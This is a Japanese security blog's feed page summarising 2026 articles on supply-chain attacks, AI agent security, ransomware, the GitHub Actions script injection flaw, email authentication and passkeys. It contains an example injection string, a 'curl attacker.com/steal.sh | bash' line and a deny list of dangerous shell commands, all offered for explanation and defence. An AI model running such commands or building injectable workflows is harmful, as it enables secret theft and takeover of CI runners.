セキュリティ on hdknr blog

ChatGPTのコード実行環境にDNSトンネリングによるデータ漏洩の脆弱性が発覚

Tue, 31 Mar 2026 00:00:00 +0000

ChatGPTのData Analysis環境にDNSトンネリングによるデータ漏洩の脆弱性をCheck Pointが発見。攻撃の仕組み、漏洩リスク、OpenAIの対応、ユーザーの対策を解説。

Claude Code のソースコードが npm のソースマップから全公開された件

Tue, 31 Mar 2026 00:00:00 +0000

Anthropic の Claude Code npm パッケージにソースマップファイルが混入し、約51万行の TypeScript ソースコードが全公開。原因の設定ミスと、npm パッケージ公開時のソースマップ対策を解説。

Pay2Key の Linux ランサムウェアが x64/ARM64 サーバーを標的に — 防御機構を無効化する高度な手口

Mon, 30 Mar 2026 00:00:00 +0000

イラン系攻撃グループ Pay2Key の Linux ランサムウェア新亜種 Pay2Key.I2P の技術分析。SELinux/AppArmor 無効化、ChaCha20 暗号化、I2P 匿名通信の手口と対策を解説。

PyPI公式パッケージ telnyx がサプライチェーン攻撃で汚染 — TeamPCPによるWAVステガノグラフィ攻撃の全容

Fri, 27 Mar 2026 00:00:00 +0000

PyPI公式パッケージ telnyx がTeamPCPのサプライチェーン攻撃で汚染。WAVステガノグラフィ手法の詳細と、Python開発者が今すぐ取るべき対策を解説。

ForceMemo: GitHub アカウントを乗っ取り Python リポジトリにバックドアを仕込む新型攻撃

Thu, 19 Mar 2026 00:00:00 +0000

2026年3月上旬から、GitHub アカウントを侵害して Python リポジトリに悪意あるコードを注入する「ForceMemo」と呼ばれる大規模攻撃キャンペーンが確認されています。force-push によるコミット履歴の書き換えと、Solana ブロックチェーンを利用した C2（Command and Control: 攻撃者がマルウェアに指令を送る仕組み）通信という巧妙な手法が特徴です。

攻撃の概要

ForceMemo は、以下の流れで Python プロジェクトを侵害します:

GitHub アカウントの侵害 — GlassWorm と呼ばれる情報窃取マルウェアが VS Code / Cursor 拡張機能から GitHub トークンを抽出
コードの改ざん — 侵害したアカウントで setup.py、main.py、app.py、manage.py 等に難読化されたマルウェアを注入
痕跡の隠蔽 — force-push でコミット履歴を書き換え、タイムスタンプを維持することで改ざんを検知困難に
C2 通信 — Solana ブロックチェーンのメモ機能を使ったコマンド＆コントロール通信

GlassWorm による初期侵入

攻撃の起点となる GlassWorm は情報窃取型マルウェアで、VS Code および Cursor の拡張機能を経由して感染します。窃取対象となる GitHub トークンの格納先は多岐にわたります:

VS Code / Cursor 拡張機能のストレージ
git credential fill の出力
~/.git-credentials ファイル
GITHUB_TOKEN 環境変数

窃取されたトークンを使って正規のアカウントとしてリポジトリにアクセスし、コードを改ざんします。

force-push による履歴改ざん

通常のコミットであれば git log で変更履歴を追跡できますが、ForceMemo は force-push を使ってコミット履歴自体を書き換えます。さらにタイムスタンプも維持するため、リポジトリのメンテナーやユーザーが改ざんに気づきにくい構造になっています。

CVE-2026-32746: GNU Inetutils telnetd に32年間潜んでいた認証前リモートコード実行の脆弱性

Wed, 18 Mar 2026 00:00:00 +0000

GNU Inetutils telnetd の認証前リモートコード実行脆弱性 CVE-2026-32746（CVSS 9.8）の技術的詳細、攻撃手法、パッチ状況、対策を解説。

Palo Alto Cortex XDR の振る舞い検知ルールが解読・バイパスされた脆弱性の全容

Wed, 18 Mar 2026 00:00:00 +0000

Cortex XDR エージェントの BIOC ルールが AES 暗号化キーのハードコードにより解読可能だった脆弱性の技術解説。ccmcache 許可リストによる検知バイパスの手口と修正内容を詳述。

1Password Unified Access：AIエージェント時代のシークレット管理が本格始動

Tue, 17 Mar 2026 00:00:00 +0000

Claude Code や Cursor で開発していると、.env に書いた API キーを AI が普通にファイルシステムから読みに行く。.gitignore していても関係ない。この課題に対して、1Password が Anthropic・Cursor・GitHub・Vercel・Perplexity と連携し「AI エージェント時代のシークレット管理」を本気で構築し始めた。

何が発表されたのか

2026年3月17日、1Password は 1Password Unified Access を発表した。人間・マシン・AI エージェントにまたがるアクセスを一元的に発見・保護・監査するためのプラットフォームだ。

従来のパスワードマネージャーの枠を超え、AI エージェントが本番環境で実際に動作する時代に合わせたクレデンシャル管理を提供する。

なぜ必要なのか：.env 問題

AI コーディングツール（Claude Code、Cursor など）は、タスク遂行のためにローカルファイルシステム上のファイルを読む。.env ファイルに平文で保存された API キーやトークンは、AI エージェントから直接アクセスできてしまう。

.gitignore はリポジトリへのコミットを防ぐだけで、ローカルファイルシステム上での読み取りは防げない。つまり、現状の .env ベースのシークレット管理は AI エージェント時代には不十分だ。

各社との連携内容

Anthropic（Claude Code / Cowork / ブラウザ拡張）

Anthropic は 1Password を統合し、Claude Code、Cowork、Claude ブラウザ拡張からボールト内のアイテムを安全にオートフィルできるようにする。ユーザーの同意のもと、Claude がサイトやサービスに 1Password から直接クレデンシャルを取得してログインできる仕組みだ。

Cursor（Hooks による just-in-time シークレット）

Cursor との連携では、Cursor Hooks を活用した just-in-time なシークレット提供を実現する。

仕組みは以下の通り:

プロジェクトに hooks.json を設定
Cursor がシェルコマンドを実行する前に、1Password Environments Hook Script が起動
プロセスがアクセスを要求すると、1Password がユーザーに認証を求める
承認されると、必要なシークレットがランタイムセッションのメモリ上にのみ提供される

これにより、平文キーがディスクやソースコードにコミットされることがなく、環境変数のハードコードやトークンの履歴残留も防げる。

Microsoft Agent Governance Toolkit：AIエージェントのセキュリティを4つの柱で守るOSSツールキット

Sat, 14 Mar 2026 00:00:00 +0000

Microsoft がオープンソースで公開した Agent Governance Toolkit は、自律型 AI エージェントに欠けていたセキュリティレイヤーを提供するツールキットだ。ポリシー強制、ゼロトラスト ID、実行サンドボックス、信頼性エンジニアリングの4つの柱で、OWASP Agentic Top 10 の全10項目のリスクをカバーする。

背景：なぜ AI エージェントにガバナンスが必要か

AI エージェントが自律的にツールを呼び出し、ファイルを操作し、外部 API と通信する時代になった。しかし、その自律性にはリスクが伴う。意図しないゴールの書き換え、過剰な権限の付与、エージェント間通信の改ざん、カスケード障害など、従来の Web アプリケーションとは異なるセキュリティ課題がある。

OWASP は「Agentic Top 10」として AI エージェント特有のリスクを定義しており、Agent Governance Toolkit はこの全10項目に対応している。

4つの柱

1. Policy Engine（ポリシーエンジン）

すべてのエージェントアクションを実行前に評価し、許可・拒否を判定する。サブミリ秒（0.1ms 未満）のレイテンシで動作するため、エージェントの応答速度に影響を与えない。

1
2
3
4
5
6


from agent_governance_toolkit import CapabilityModel

capabilities = CapabilityModel(
 allowed_tools=["web_search", "file_read"],
 denied_tools=["file_write", "shell_exec"]
)

許可するツールと拒否するツールを明示的に定義し、エージェントが意図しない操作を行うことを防ぐ。

GitHub で見つけた「便利ツール」を解析したらマルウェアだった話：偽 OpenClaw インストーラーの実態

Wed, 11 Mar 2026 00:00:00 +0000

GitHub 上で OpenClaw の便利ツールを装った不審なリポジトリが発見され、実際に解析したところマルウェア（シェルコードローダー）であることが判明した。ひよっこサウナ氏（@hiyoko_sauna）による詳細な解析レポートを基に、この攻撃手法の全体像を紹介する。

対象リポジトリの特徴

github.com/sdwadsagw/OpenClawInstaller という、「Open Claw を簡単にインストールできるツール」として公開されていたリポジトリが対象だ。

項目	値
アカウント作成日	2026-02-11（リポジトリと同日作成）
Star / Fork	2 / 0
説明文	「AI assistant for Open Claw」

使い捨てアカウント（リポジトリと同日作成）という時点で怪しさ満点だ。

ZIP の中身

Claw-Installer-Open-2.8-alpha.3.zip を展開すると 4 ファイルが入っていた。

ファイル	サイズ	VT 検出率	説明
StartApp.bat	22 bytes	-	`start luau.exe asm.txt` を実行するだけ
luau.exe	288,768 bytes	25/76	LuaJIT 2.1.0-beta3（正規バイナリ）
lua51.dll	390,144 bytes	1/75	LuaJIT 用ランタイム DLL
asm.txt	309,298 bytes	0/76	難読化された Lua スクリプト

注目すべきは asm.txt の検出率が 0/76 という点だ。悪意のあるコードは asm.txt に書かれているのに検出されず、無害な luau.exe の方が検出されるという逆転現象が起きている。

Kali Linux × Ollama × MCP — 完全ローカルで動く AI ペンテスト環境の構築

Wed, 11 Mar 2026 00:00:00 +0000

Kali Linux チームが、外部 SaaS に一切依存しない完全ローカルの AI ペンテスト支援環境の構築ガイドを公式ブログで公開した。Ollama でローカル LLM を動かし、MCP（Model Context Protocol）経由で nmap などの Kali ツールを自然言語から操作する構成だ。

構成要素

コンポーネント	役割	アーキテクチャ上の位置づけ
Ollama	ローカル LLM サーバー。llama.cpp のラッパーとしてモデルのダウンロード・サービングを簡素化	推論エンジン（脳）
mcp-kali-server	Flask ベースの MCP サーバー（127.0.0.1:5000）。nmap, gobuster, nikto, hydra, sqlmap 等の Kali ツールを MCP 経由で公開	ツールサーバー（手足）
5ire	デスクトップ AI アシスタント兼 MCP クライアント。ユーザー入力を LLM に送り、LLM の応答からツール呼び出しを検出し、MCP 経由でツールを実行し、結果を LLM に戻すループを回す	AI エージェント（オーケストレーター）

この構成で「エージェント」に相当するのは 5ire だ。LLM（Ollama）は推論を担うだけであり、ツールサーバー（mcp-kali-server）は呼ばれるのを待つだけ。ユーザーの意図を解釈し、LLM とツールの間を仲介して自律的にループを回す 5ire こそがエージェントの役割を果たしている。Claude Code に例えると、Ollama は API の向こう側の Claude モデル、mcp-kali-server は MCP サーバー、5ire は Claude Code 本体に相当する。

マッキンゼーの社内AI「Lilli」がSQLインジェクションで完全突破された件

Wed, 11 Mar 2026 00:00:00 +0000

セキュリティスタートアップ CodeWall の AI エージェントが、マッキンゼーの社内 AI プラットフォーム「Lilli」をわずか2時間で完全突破した。4,650万件のチャット履歴からシステムプロンプトまで、認証なしで読み書き可能だったという。攻撃手法は SQL インジェクション——教科書の1章目に載る古典的な脆弱性だ。

Lilli とは

Lilli はマッキンゼーが社内向けに構築した生成 AI プラットフォームで、数万人のコンサルタントが日常的に利用している。戦略立案、M&A 分析、クライアント対応など、機密性の高い業務に活用されていた。

Lilli のアーキテクチャ

マッキンゼーは Lilli の技術構成をある程度公開しており、その設計思想と今回の事件のギャップが際立つ。

RAG パイプライン + オーケストレーション層

Lilli のコアは RAG（Retrieval-Augmented Generation）パイプラインだ。40以上のキュレーション済みナレッジソースに10万件超のドキュメント、インタビュー記録、セクター別プレイブックが格納されている。ユーザーのクエリはベクトル埋め込みでマッチングされ、5〜7件の関連文書が引用付きで提示される。四半期あたり約200万クエリを処理する規模だ。

技術スタック

LLM: Cohere、OpenAI（Azure 経由）など複数モデルを併用。Microsoft、Google、Nvidia、Anthropic との戦略的パートナーシップ
フレームワーク: QuantumBlack の Horizon ツールキット、LangChain、FAISS
インフラ: Microsoft Azure（データストレージ・スケーラビリティ）
独自ツール: PowerPoint を85%以上読み取り可能にする独自ドキュメントパーサー

「ゼロトラスト」設計——のはずだった

マッキンゼーは Lilli のセキュリティについて、ゼロトラストセキュリティスタック、オンプレミスデータストア、ロールベースアクセス制御（RBAC）、完全な監査ログを備えていると説明していた。しかし実際には、22個の API エンドポイントが認証なしで外部に公開されていた。設計上のセキュリティと実装上のセキュリティの乖離が、今回の事件の根本原因だ。

攻撃の経緯

CodeWall の自律型セキュリティエージェントは、以下の手順で Lilli を攻撃した:

公開 API ドキュメントの発見 — Lilli の API ドキュメントが外部から閲覧可能な状態だった
認証不要エンドポイントの特定 — 22個のエンドポイントが認証なしでアクセス可能だった
SQL インジェクションの検出 — ユーザー検索クエリを書き込むエンドポイントで、JSON のキー名が SQL 文に直接連結されていた
本番データベースへのフルアクセス — 読み取りと書き込みの両方が可能な状態に到達

人間の介入は一切なし。AI エージェントが自律的に脆弱性を発見し、エクスプロイトまで完了した。

脆弱性管理の次の時代 ── Exposure Management とは何か

Wed, 11 Mar 2026 00:00:00 +0000

企業のセキュリティチームは深刻な課題に直面しています。NVD（National Vulnerability Database）に登録される CVE は年間 25,000 件以上。多くの企業では数万〜数十万の脆弱性がスキャンで検出されます。しかし現実は明確で、「すべてを修正することは不可能」です。

この状況を背景に、ガートナーは新しいセキュリティの考え方として Exposure Management（エクスポージャー管理） を提示しました。

CVSS とは何か

Exposure Management を理解する前に、従来の脆弱性管理の中核にある CVSS（Common Vulnerability Scoring System） について押さえておきましょう。

CVSS は、脆弱性の深刻度を 0.0〜10.0 のスコアで数値化する国際的な評価基準です。FIRST（Forum of Incident Response and Security Teams）が管理しており、現在は v3.1 と v4.0 が使われています。

スコア	深刻度
9.0〜10.0	Critical（緊急）
7.0〜8.9	High（重要）
4.0〜6.9	Medium（警告）
0.1〜3.9	Low（注意）

スコアは以下の観点から算出されます。

攻撃元区分 — ネットワーク経由か、物理アクセスが必要か
攻撃条件の複雑さ — 特殊な条件が必要か
必要な特権レベル — 認証が必要か
ユーザ関与 — ユーザの操作（リンクのクリック等）が必要か
影響範囲 — 機密性・完全性・可用性への影響度

CVSS は脆弱性の技術的な深刻度を標準化された方法で伝える点で非常に有用です。しかし、このスコアだけに頼る運用には限界があります。

従来の脆弱性管理の限界

従来のアプローチは「脆弱性スキャン → CVSS スコアで優先順位付け → パッチ適用」というものでした。しかし現代の IT 環境では以下の課題があります。

中国政府が OpenClaw に緊急セキュリティ警告：AI エージェントの安全な運用とは

Wed, 11 Mar 2026 00:00:00 +0000

オープンソースの AI エージェントフレームワーク「OpenClaw」の利用が中国国内で急拡大する中、中国の国家コンピュータネットワーク緊急対応技術チーム（CNCERT）が緊急のセキュリティ警告を発しました。政府機関や国有銀行での使用禁止にまで発展したこの問題について、技術的な背景と対策をまとめます。

何が起きたのか

2026年3月、中国の CNCERT は OpenClaw について「極めて弱いデフォルトセキュリティ設定」を持つと警告を発しました。OpenClaw はローカルファイルシステムや環境変数へのアクセス、拡張機能のインストールなど高いシステム権限を付与されますが、デフォルトのセキュリティ設定が不十分であり、攻撃者がシステム全体の制御を容易に奪取できる状態であると指摘されています。

この警告を受けて、中国当局は政府機関と国有企業（主要銀行を含む）に対し、業務用コンピュータへの OpenClaw のインストールを禁止する通知を出しました。既にインストール済みの職員には、上司への報告・セキュリティチェック・必要に応じた削除が指示されています。

CNCERT が指摘した主なリスク

1. アーキテクチャ設計上の問題

OpenClaw はローカルファイルシステム、環境変数、シェルへの広範なアクセス権限を持ちます。これ自体は AI エージェントの機能として必要ですが、適切な制限なしに運用すると重大なリスクとなります。

2. デフォルト設定の脆弱性

管理 UI のデフォルトポートがインターネットに公開可能な状態
環境変数に認証情報を平文で保存する設定がデフォルト
スキルの自動更新が有効な状態がデフォルト

3. プラグインエコシステムの危険性

不正なプラグイン（ポイズンドプラグイン）を通じて、ユーザーのシステムに悪意あるコードが侵入するリスクがあります。プラグインのアクセス権限が十分に制限されていないことが問題視されています。

4. Web ベースの攻撃

悪意ある指示を Web ページに埋め込むことで、OpenClaw に不正な操作を実行させる攻撃（プロンプトインジェクション）が可能です。

5. 重要データの誤削除

AI エージェントの判断ミスにより、ユーザーが意図しない重要データの削除が発生するリスクも指摘されています。

CNCERT の推奨対策

CNCERT は以下の対策を推奨しています。

コンテナで隔離実行する — OpenClaw をホストシステムから隔離された環境で動作させる
管理ポートをインターネットに公開しない — 管理 UI へのアクセスをローカルネットワークに限定する
認証情報を平文で環境変数に保存しない — シークレット管理ツールを使用する
スキルの自動更新を無効にする — 更新は手動で検証してから適用する
厳密な認証とアクセス制御を実装する — 不要な権限を排除する
セキュリティアップデートへの追従を徹底する — 既知の脆弱性に速やかに対応する

AI エージェント全般への教訓

この問題は OpenClaw に限った話ではありません。AI エージェントは本質的に高いシステム権限を必要とするため、以下の原則はどのエージェントツールにも当てはまります。

Claude Codeの「セキュリティ%表示」は対策ではなく"お気持ち表示"？本当にやるべきセキュリティ設定

Tue, 10 Mar 2026 00:00:00 +0000

Claude Codeでツール実行のたびに「パスワード漏洩リスク: 0%」「悪意あるコード実行リスク: 0%」のようなセキュリティリスクのパーセンテージを表示させるCLAUDE.mdの設定がSNSで話題になった。これに対し、セキュリティエンジニアから「それは対策ではなくお気持ち表示」という指摘が上がり、議論を呼んでいる。

話題になった「パーセンテージ表示」

@wan_line_（ワン@AIのお兄さん）氏が2026年3月9日に投稿したポストでは、CLAUDE.mdに以下のようなルールを記述することが提案されていた:

ツール実行のたびに

パスワードが外に漏れる可能性: ○%

外部サーバーにデータが送られる可能性: ○%

悪意あるコードが動く可能性: ○%

PCの設定が書き換わる可能性: ○%

Claude Codeで「yes連打」してしまうユーザー向けに、実行前にリスクを可視化してくれるという趣旨だ。

セキュリティ専門家の反論:「お気持ち表示」

この投稿に対し、@sudachikawaii（シンジ☁Shinji）氏が反論した:

セキュリティ屋から言うと、これは「対策」ではなく「お気持ち表示」です。LLMはコードの安全性を静的解析していないので、表示されるパーセンテージに技術的根拠がありません。

「0%」を見てyes押すのは、yes連打と同じです。

指摘のポイントは明快だ:

LLMは静的解析エンジンではない — LLMが出すパーセンテージは、コードを構文解析して脆弱性を検出した結果ではなく、「それっぽい数値」を生成しているだけ
偽の安心感を与える — 「0%」という表示を見てユーザーが安心してyesを押すなら、結局yes連打と変わらない
技術的根拠がない — 実際のセキュリティリスク分析には、静的解析ツール（SAST）、依存関係チェック、ネットワーク通信の監視などが必要

Claude Codeに本当に効くセキュリティ対策

Claude Codeには、CLAUDE.mdの「お気持ちルール」よりもはるかに実効性のあるセキュリティ機能が組み込まれている。公式ドキュメントに基づき、本当にやるべき対策を整理する。

1. サンドボックスを有効にする

最も重要な対策。Bashコマンドの実行をOSレベルで隔離し、ファイルシステムやネットワークへのアクセスを制限する。

macOSではSeatbelt、LinuxではBubble Wrapが使用される
/sandbox コマンドで有効化

2. denyルールで危険なコマンドをブロック

permissions.deny に実行禁止コマンドを明示的に設定する。評価順は deny → ask → allow で、denyが最優先。

1
2
3
4
5
6
7
8
9


{
 "permissions": {
 "deny": [
 "Bash(command:rm -rf *)",
 "Bash(command:curl *)",
 "Bash(command:wget *)"
 ]
 }
}

3. 機密ファイルへのアクセスを遮断

.env やシークレットファイルへのアクセスをブロックする。

Vibe Hacking とは何か：AI が変えるサイバー攻撃の新潮流

Tue, 10 Mar 2026 00:00:00 +0000

「Vibe Coding」が開発者の間で広まる中、同じ発想をサイバー攻撃に応用する「Vibe Hacking」が新たな脅威として注目されている。AI を使って、専門知識がなくてもマルウェアや攻撃スクリプトを生成できる時代が到来した。

Vibe Hacking とは

Vibe Hacking は、AI を活用してサイバー攻撃のハードルを劇的に下げる手法・思想を指す。開発者が自然言語で AI にコードを書かせる「Vibe Coding」のダークサイドとも言える概念だ。

従来のハッキングには、ネットワークプロトコルの理解、脆弱性の発見、エクスプロイトコードの記述といった高度な技術スキルが必要だった。しかし Vibe Hacking では「ターゲットを指定するだけ」「経験不要」「AI が処理する」といった形で、技術的な障壁がほぼ消失する。

具体的な脅威

AI 生成マルウェア

HP Wolf Security の脅威インサイトレポート（2025年10月〜12月）によると、攻撃者は AI で生成した感染スクリプトを実際の攻撃キャンペーンに使用している。偽のインボイス PDF を通じて、正規のプラットフォーム（Booking.com など）へリダイレクトする前にマルウェアをダウンロードさせる手口が確認されている。

Flat-Pack Malware

複数の無関係な脅威グループが、同一のモジュール化されたマルウェアコンポーネントを再利用する「Flat-Pack Malware」も増加している。市販のマルウェア部品を組み立てるだけで、最小限の労力でカスタマイズされた攻撃キャンペーンを展開できる。

国家レベルの活用

パキスタン系の脅威アクター「Transparent Tribe」が、AI コーディングツールを使ってマルウェアを「Vibe Coding」し、インド政府やその海外大使館を標的にした事例も報告されている。

なぜ危険なのか

攻撃コストの劇的な低下

脆弱性の発見からエクスプロイト作成までのコストは、かつて数週間と数千ドルを要した。AI によりこれがほぼゼロになりつつある。「スプレー＆プレイ」型の大規模攻撃ではなく、特定のシステムや企業、さらには個々の開発者をピンポイントで狙うマイクロターゲット攻撃が現実的になった。

検出回避能力の向上

HP の調査では、メール脅威の 14% 以上がゲートウェイスキャナーを回避している。AI が生成するコードは毎回微妙に異なるため、シグネチャベースの検出が困難になっている。

Vibe Coding で作られたアプリの脆弱性

攻撃だけでなく、Vibe Coding で開発されたアプリケーション側も問題を抱えている。Veracode の GenAI コードセキュリティレポートによると、AI 生成コードの 45% にセキュリティ脆弱性が含まれている。AI はほぼ半分の確率で安全でない実装を選択する。

対策のポイント

AI によるコードレビューの自動化

Vibe Coding で生成された全コードを人間がレビューするのは現実的ではない。コード生成が AI なら、レビューも AI で自動化するのが自然な流れだ。

GitHub Actions スクリプトインジェクション完全解説 — ${{ }} を run に書いた瞬間、攻撃者にシェルを渡している

Fri, 06 Mar 2026 00:00:00 +0000

GitHub Actions スクリプトインジェクション完全解説 — `${{ }}` を `run` に書いた瞬間、攻撃者にシェルを渡している

『GitHub CI/CD実践ガイド』著者の tmknom 氏（@tmknom）が、GitHub Actions のスクリプトインジェクションを解説した Zenn 記事を引用し、こう呼びかけています。

はい、というわけでしてね。みんな『GitHub CI/CD実践ガイド』を、穴が開くまで読んでくださいね！

引用されている kou_pg_0131 氏の Zenn 記事は、GitHub Actions の run ステップで ${{ }} テンプレート式を使う際のインジェクション脆弱性を実演付きで解説した記事です。2025〜2026年にかけて GitHub Actions のサプライチェーン攻撃が急増しており、この知識はすべての開発者にとって必須になっています。

何が危険なのか — 30秒で理解する

1
2


# 危険なコード
- run: echo "PR title is ${{ github.event.pull_request.title }}"

一見無害なこのコード。しかし攻撃者が PR タイトルに以下を入力すると、任意のコマンドが実行されます。

"; echo INJECTED"

展開後のシェルコマンドは以下になります。

1

echo "PR title is "; echo INJECTED""

セミコロンでコマンドが分割され、echo INJECTED が実行されます。echo の代わりに curl attacker.com/steal.sh | bash を書けば、CI/CD ランナー上でリバースシェルの確立、シークレットの窃取、リポジトリの改ざんが可能です。

GitHub Actionsスクリプトインジェクション完全解説 — ${{ }}をrunに書いた瞬間、攻撃が始まる

Thu, 05 Mar 2026 00:00:00 +0000

GitHub Actions スクリプトインジェクション完全解説 — `${{ }}` を run に書いた瞬間、攻撃が始まる

@koki_develop 氏のポストで紹介された Zenn 記事が話題になっています。

書きました。GitHub Actions 触る人は全員知っておいてほしい

【GitHub Actions】スクリプトインジェクションの実践例（koki 氏）は、GitHub Actions ワークフローにおけるスクリプトインジェクションの仕組みを具体的なコード例で解説した記事です。「プライベートリポジトリなら大丈夫？」という疑問にも明確に「安全ではない」と回答しています。

2025 年には GhostAction キャンペーンで 3,325 件のシークレットが窃取され、tj-actions/changed-files のサプライチェーン攻撃では 23,000 以上のリポジトリが影響を受けました。スクリプトインジェクションは理論上の脅威ではなく、現在進行形のリスクです。

スクリプトインジェクションとは何か

GitHub Actions の ${{ }} 式は、シェルがコマンドを解析する前にテンプレートエンジンによって展開されます。この順序が脆弱性の根本原因です。

通常の期待:
${{ github.event.pull_request.title }} → 文字列として処理される
実際の動作:
${{ github.event.pull_request.title }} → 値がそのままシェルスクリプトに埋め込まれる
→ シェルがコマンドとして解釈する

つまり、PR タイトルやブランチ名など攻撃者が制御可能な値が、そのままシェルコマンドの一部になります。

攻撃の実践例

攻撃 1: PR タイトルによるインジェクション

脆弱なワークフロー:

1
2
3
4
5
6
7
8


on:
 pull_request:

jobs:
 example:
 runs-on: ubuntu-latest
 steps:
 - run: echo "PR title is ${{ github.event.pull_request.title }}"

攻撃者が PR タイトルを "; echo INJECTED" に設定すると:

上場企業3,700社のSPF/DMARC設定を全調査 — 「p=none」が半数、日本のメール認証の現在地

Tue, 03 Mar 2026 00:00:00 +0000

上場企業3,700社のSPF/DMARC設定を全調査 — 「p=none」が半数、日本のメール認証の現在地

@yoppy0123 氏のポストが、上場企業のメール認証設定を網羅的に調査した Zenn 記事を紹介しています。

上場企業（約3,700社）を対象にSPF / DMARCの設定状況を調査した記事です。実際のところどうなんだろう？と気になっていたので、とても参考になりました！

元記事は ext0mmy 氏による「上場企業約3,700社のSPF/DMARC設定状況調査」です。2026年3月1日時点で、JPX（日本取引所グループ）に上場する3,745社を対象に、DNS レコードから SPF と DMARC の設定状況を調査しています。

Google が Gmail の送信者ガイドラインで DMARC 対応を義務化してから2年。日本の上場企業はどこまで対応が進んだのか、調査結果を技術的な背景とともに解説します。

メール認証の基礎 — SPF・DKIM・DMARC の仕組み

調査結果を読み解くために、まずメール認証の3つの技術を整理します。

SPF（Sender Policy Framework）

SPF は、メールの送信元 IP アドレスを検証する技術です。ドメインの DNS レコードに「このドメインからメールを送信してよい IP アドレスの一覧」を登録しておき、受信側がそれを照合します。

example.co.jp IN TXT "v=spf1 include:_spf.google.com ~all"

末尾の修飾子が認証失敗時のポリシーを決定します。

修飾子	意味	厳しさ
`+all`	全て許可	設定する意味がない
`~all`（softfail）	認証失敗を記録するが配信は許可	緩い
`-all`（fail）	認証失敗のメールを拒否	厳しい

DKIM（DomainKeys Identified Mail）

DKIM は、メールに電子署名を付与し、送信中の改ざんを検知する技術です。送信サーバがメールヘッダとボディに署名を付け、受信サーバが DNS に公開された公開鍵で検証します。SPF が「どこから送ったか」を検証するのに対し、DKIM は「改ざんされていないか」を検証します。

DMARC（Domain-based Message Authentication, Reporting and Conformance）

DMARC は、SPF と DKIM の認証結果を束ねて、認証失敗時の処理方針を定めるフレームワークです。

FIDO2 認証（パスキー）の仕組み — パスワードを「構造的に不要にする」技術

Mon, 02 Mar 2026 00:00:00 +0000

FIDO2 認証（パスキー）の仕組み — パスワードを「構造的に不要にする」技術

サイボウズのバグバウンティで複数年度 1 位の実績を持つセキュリティ研究者 @yousukezan さんのポストで紹介されていた、FIDO2 認証（パスキー）の概要記事を深掘りします。元記事は Nagano さんの Zenn 記事です。

2026 年現在、日本証券業協会がパスキー（FIDO2）の導入を必須化するガイドラインを施行し、楽天証券・SMBC 日興証券などが相次いで導入を進めています。パスキーはもはや「新しい技術」ではなく「必須のインフラ」になりつつあります。

パスワード認証の根本的な問題

パスワード認証には、仕組みそのものに起因する構造的な脆弱性があります。

graph LR
USER["ユーザー"] -->|パスワードを送信| SERVER["サーバー"]
ATTACKER["攻撃者"] -.->|盗聴・フィッシング| USER
style USER fill:#3498db,color:#fff
style SERVER fill:#2ecc71,color:#fff
style ATTACKER fill:#e74c3c,color:#fff

脅威	内容
フィッシング	偽サイトにパスワードを入力させる
リスト型攻撃	漏洩したパスワードを他サービスで試行
中間者攻撃	通信を傍受してパスワードを盗む
サーバー侵害	サーバーに保存されたパスワードハッシュの漏洩

これらの問題は「秘密情報（パスワード）をネットワーク経由で送信する」という設計そのものに起因します。ワンタイムパスワード（OTP）でも、この根本構造は変わりません。実際、日本証券業協会は 2025 年 10 月のガイドライン改正で、OTP の利用を非推奨としています。

FIDO2 の設計思想 — 「秘密を送らない」

FIDO2 は発想を根本から変えました。秘密情報をネットワーク上に一切流さない認証方式です。

graph LR
subgraph デバイス側
USER2["ユーザー"] -->|生体認証/PIN| AUTH["認証器<br/>（TPM等）"]
AUTH -->|秘密鍵で署名| SIGNED["署名データ"]
end
subgraph サーバー側
SIGNED -->|署名のみ送信| VERIFY["公開鍵で検証"]
end
style USER2 fill:#3498db,color:#fff
style AUTH fill:#f39c12,color:#fff
style SIGNED fill:#9b59b6,color:#fff
style VERIFY fill:#2ecc71,color:#fff

パスワード認証では「秘密そのもの」を送信しますが、FIDO2 では「秘密鍵で作った署名」だけを送信します。秘密鍵はデバイス内の安全な領域（TPM、Secure Enclave 等）に保管され、外部に出ることはありません。

django-oauth-toolkit 2.0 の client_secret ハッシュ化で外部連携が壊れた話

Fri, 13 Feb 2026 00:00:00 +0000

django-oauth-toolkit 2.0 の client_secret ハッシュ化で外部連携が壊れた話

TL;DR

django-oauth-toolkit を 1.x から 2.0 にアップグレードすると、Application.client_secret が 平文からハッシュ値に自動変換 される。この変更に気づかず、DB 上のハッシュ値を「シークレット」として外部サービスにコピーすると、二重ハッシュ で認証が通らなくなる。さらに、Application を動的に生成するコードがある場合、バージョンアップ後に平文を返すべき箇所でハッシュ値を返してしまう問題も起きる。

背景

2つの Django サービス間で OAuth2 Client Credentials Grant による認証を行っていた。

サービス	役割	django-oauth-toolkit
Service A (リソースサーバー)	ファイル配信 API を提供	2.4.0
Service B (クライアント)	API からファイルを取得	1.7.1

Service B は Service A の OAuth2 トークンエンドポイントに HTTP Basic Auth で client_id:client_secret を送信し、アクセストークンを取得してからファイルをダウンロードする。

Service B Service A
| |
|-- POST /o/token/ --------------->|
| Authorization: Basic base64( |
| client_id:client_secret) |
| |-- client_secret をハッシュ化
| |-- DB のハッシュ値と比較
|<-- access_token -----------------|
| |
|-- GET /api/files/ -------------->|
| Authorization: Bearer token |
|<-- file data --------------------|

このフローは数年間安定稼働していた。

Hubspot

Tue, 25 Mar 2025 00:00:00 +0000

CTA

ビデオ埋め込み

viemoなどiframe配信できるサーバーにホスティングしているビデオが対象
vimeoの muted=1&autoplay=1 でも自動再生はできない (セキュリティ上の問題。自動再生は、ユーザーのトリガーがないとしてくれないケースがある)

ショートムービーをアニメーションGIFに変換:

1

ffmpeg -i input.mp4 -r 10 output.gif

Contentful

Wed, 12 Feb 2025 00:00:00 +0000

Contentful

CDA / CMA

Contentful における Content Delivery API キーと CMA トークンの用途の違いについて説明します。

Content Delivery API キー (CDA キー)

用途: コンテンツ配信 API (CDA) へのアクセスを認証するために使用されます。
役割: 公開されたコンテンツを取得するために使用されます。ウェブサイトやモバイルアプリなどのフロントエンドアプリケーションから Contentful のコンテンツを読み込む際に、このキーが使用されます。
特徴: 読み取り専用のアクセス権を持ちます。コンテンツの作成、更新、削除などの変更操作はできません。
セキュリティ: 比較的安全性が低いとされています。キーが漏洩した場合でも、コンテンツの変更はできませんが、コンテンツを不正に取得される可能性があります。

Content Management API トークン (CMA トークン)

用途: コンテンツ管理 API (CMA) へのアクセスを認証するために使用されます。
役割: Contentful のコンテンツを管理 (作成、更新、削除など) するために使用されます。Contentful のバックエンドシステムや管理画面、または外部のツールから Contentful のコンテンツを操作する際に、このトークンが使用されます。
特徴: 読み取り/書き込みのアクセス権を持ちます。コンテンツの変更操作が可能です。
